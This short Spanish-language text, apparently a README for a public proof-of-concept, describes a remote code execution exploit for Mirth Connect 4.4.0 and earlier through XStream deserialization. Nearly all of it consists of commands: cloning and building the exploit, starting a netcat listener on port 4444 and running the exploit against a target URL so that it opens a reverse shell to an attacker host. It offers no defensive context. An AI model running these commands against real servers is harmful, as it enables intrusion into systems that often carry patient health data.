
PoC para la Ejecución Remota de Código (RCE) en Mirth Connect
PoC para la ejecución remota de código (RCE) en Mirth Connect. Afecta a Mirth Connect <= 4.4.0 mediante deserialización de XStream.
git clone https://github.com/Pegasus0xx/CVE-2023-43208.git && \
cd CVE-2023-43208 && \
make
./exploit <URL> <LHOST> <LPORT>
nc -lvnp 4444
./exploit https://target.com 10.10.10.10 4444